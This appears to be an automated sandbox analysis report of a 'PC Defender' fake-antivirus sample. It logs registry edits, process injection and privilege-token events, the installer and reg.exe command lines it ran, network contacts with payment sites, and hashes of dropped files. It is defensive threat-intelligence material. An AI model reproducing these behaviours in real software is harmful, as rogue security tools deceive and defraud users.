Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Version = "16777216" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\PackageName = "PCDefenderSilentSetup.msi" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\DeploymentFlags = "3" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Media C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528\DefaultFeature C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1660 wrote to memory of 344 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 344 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 344 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 344 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 1500 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 1500 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 1500 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 1500 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 820 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 820 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 820 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 820 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 2824 N/A C:\Windows\syswow64\MsiExec.exe C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe
PID 1660 wrote to memory of 2824 N/A C:\Windows\syswow64\MsiExec.exe C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe
PID 1660 wrote to memory of 2824 N/A C:\Windows\syswow64\MsiExec.exe C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe
PID 1660 wrote to memory of 2824 N/A C:\Windows\syswow64\MsiExec.exe C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe
PID 2824 wrote to memory of 1148 N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe
PID 2824 wrote to memory of 1148 N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe
PID 2824 wrote to memory of 1148 N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe
PID 2824 wrote to memory of 1148 N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe
PID 1752 wrote to memory of 1700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Windows\System32\ie4uinit.exe
PID 1752 wrote to memory of 1700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Windows\System32\ie4uinit.exe
PID 1752 wrote to memory of 1700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Windows\System32\ie4uinit.exe
PID 1752 wrote to memory of 2144 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1752 wrote to memory of 2144 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1752 wrote to memory of 2144 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1752 wrote to memory of 2144 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005BC" "00000000000004A0"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D03C52A3A4BAC024271885A7D74981C4 M Global\MSI0000

C:\Windows\SysWOW64\reg.exe

"C:\Windows\SysWOW64\reg.exe" COPY HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ /s /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\SysWOW64\reg.exe" COPY HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ /s /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\SysWOW64\reg.exe" COPY HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ /s /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\SysWOW64\reg.exe" DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 /f

C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe

"C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe"

C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe

"C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe" Antispyware.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding

C:\Windows\System32\ie4uinit.exe

"C:\Windows\System32\ie4uinit.exe" -ShowQLIcon

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1752 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1752 CREDAT:537612 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1752 CREDAT:275482 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.plimus.com udp
US 104.18.31.105:443 www.plimus.com tcp
US 104.18.31.105:443 www.plimus.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 104.18.31.105:443 www.plimus.com tcp
US 104.18.31.105:443 www.plimus.com tcp
US 8.8.8.8:53 www.bluesnap.com udp
US 141.193.213.20:443 www.bluesnap.com tcp
US 141.193.213.20:443 www.bluesnap.com tcp
US 141.193.213.20:443 www.bluesnap.com tcp
US 141.193.213.20:443 www.bluesnap.com tcp
US 104.18.31.105:443 www.plimus.com tcp
US 104.18.31.105:443 www.plimus.com tcp
US 141.193.213.20:443 www.bluesnap.com tcp
US 141.193.213.20:443 www.bluesnap.com tcp
US 8.8.8.8:53 cp.bluesnap.com udp
US 8.8.8.8:53 cp.bluesnap.com udp
US 104.18.26.40:443 cp.bluesnap.com tcp
US 104.18.26.40:443 cp.bluesnap.com tcp
US 104.18.26.40:443 cp.bluesnap.com tcp
US 104.18.26.40:443 cp.bluesnap.com tcp
US 104.18.26.40:443 cp.bluesnap.com tcp
US 104.18.26.40:443 cp.bluesnap.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi

MD5 7f728acab22868ca02cc1ba0a14f5d64
SHA1 9e3e82b152447b8bcd27583fbdab7aa91ca4739d
SHA256 586f9a9af50b2a3321e77d2b4583741cc4842967af9429cc371534f7179caec4
SHA512 9bc8bb97e6d4f18ec484fcd792466cb5df0bf0447cbaa19a41258ef80e599e8a2b2c83c700f32f30bef578b03614af1b554844d051435dc9f510ccbd56686800

memory/1660-26-0x0000000000280000-0x0000000000282000-memory.dmp

C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe

MD5 af4761437567f84ffbec44c978ac2634
SHA1 488e27e01b629f3c2cd274a3c6572cdb040fc137
SHA256 41922380e3a419fea5a794a16e7abe3364c08da6c66fca0ce8f37c20e21ede68
SHA512 82694af3458a01040b9753f133e446c32fef105d4d36dfe8a5fa944080f4b6736dc8e4fbe2abb3db6f79ff24f8e1b9f07543c1193410cfa0a3faafd3e1ce096d

C:\Config.Msi\f76c19e.rbs

MD5 c156397be71b0387833fa5ee82450c83
SHA1 f64696065ed78ecb6527c5c2bc14531b24283358
SHA256 24b9d981a3d19e77963e826656db1ef21f0d15caa89d2a5575c3c6a56d43162f
SHA512 ada3559e0c9a18acfd92c97af42dd037a4b2138afde8f12f5d719365ccfbeb8d4e0facd2f6268f5540fa05982d64d0c59626547e15b0ea4afc1f27ee5def122f

\Program Files (x86)\Def Group\PC Defender\hook.dll

MD5 dc973050688bfd27a2d47e0ac2e21abb
SHA1 3ff84e8c292051aa7e57439aa44b7beac68b2d71
SHA256 e69c437e565390cbc0209e7934136cc68a7caa07cf7341c870dac35ca549b225
SHA512 4123df1cb903bff54897e1edd8c8c877e3fff9b81de9919569b3096fac8d80d06f73f005ef1c63269f4b50d7ee1965deb13d473b32f365c8324880ab995a600c

C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe

MD5 c2514c216b4b6dac1a4d740126177f29
SHA1 c25d7b051339c9d0b1ee109abfb12724a24f130d
SHA256 8212f98e9caedd00bab3c3d561055507cd617cc2b2151c956968caeccde66e11
SHA512 dfe6dab9e14b539e50eea2b8314f3937f650eded149d1264763ee4d0d045bf1959569cb31e9e7d5bf602e49c68401cde02e2e552ef3d0baca2e4d48c53d78692

memory/2824-167-0x0000000002530000-0x0000000002532000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab95CA.tmp

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar96E8.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ece29a6d223a9b0606015e0edaca2274
SHA1 7cb5496f3fddf20006215bf4d3db56c86a9f9f3d
SHA256 993e4ed452681c71c09a020f6dc286d31874775fb9adbc98728bc20827e6cf0e
SHA512 2964fb5ba228e5bb1c96cb90a477cfde43e85dacccc284d1394f2e19a4ad44c779d9ab48fc973abdccbbf0ecb22af26937776081e543dbaa4e65870a74b2aa42

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 f214c493fcdf1d0d7846f0e333dfd429
SHA1 6328cd1f245c473a710622f271dbc23958e8b36f
SHA256 b115366d00d960c96f2c54ce06f7b8af704cb2566182cdf75e29cf9576661dc5
SHA512 59200140399a99311b8eb5f4948a7569a568eb14449e05d2d4ddf1004de96ed52f8d970dcd6854ddfdbe08827f61467cfc2905549dfe90381b25b5395be5c38e

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 e3aa453a55638bcecc11958b116dc597
SHA1 224fa7cbc8bd7364894bf00532eb0f4ca6468e3f
